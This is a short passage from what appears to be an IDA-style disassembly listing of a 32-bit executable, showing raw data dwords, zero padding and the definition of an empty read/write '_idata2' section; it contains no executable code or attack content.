dd 4D000000h, 5043EB11h, 5058DD23h, 0ED3B220Ch, 2810Fh
dd 0E3220000h, 0E31A971Ch, 4F4F5Fh, 55Ah dup(0)
fuck ends
; Section 5. (virtual address 00080000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00080000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 480000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start